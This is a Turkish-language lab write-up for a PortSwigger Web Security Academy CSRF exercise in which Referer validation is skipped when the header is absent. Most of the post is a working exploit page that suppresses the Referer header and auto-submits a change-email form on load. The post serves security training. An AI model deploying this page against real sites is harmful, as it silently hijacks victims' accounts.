Bu bölümde uygulamanın HTTP Üstbilgisinde doğrulama yaptığını,çeşitli yöntemlerle atlatılacağını ve bu yöntemlerin birine değinmiş olacağız.
Lab 7 : https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present
Gereksinim : HTTP Üstbilgileri,CSP Politikaları v.b.
Referer için okuyun ; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer
Kod hali
<!DOCTYPE html>
<html>
<head>
<title></title>
//referer etiketi
<meta name="referrer" content="no-referrer">
</head>
<body>
<form class="login-form" action="https://ac551f061f39994b80f1015c00e200cc.web-security-academy.net/email/change-email" method="POST">
<label>Email</label>
<input required type="email" name="email" value="offensivesecurity.org">
<button class='button' type='submit'> Update email </button>
<script>
document.forms[0].submit();
</script>
</form>
</body>
</html>Her şeyi doğru yaptıysanız muhtemelen başarılı sonuç alacaksınız.
Sorularınız için yorum yapmayı unutmayın.
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish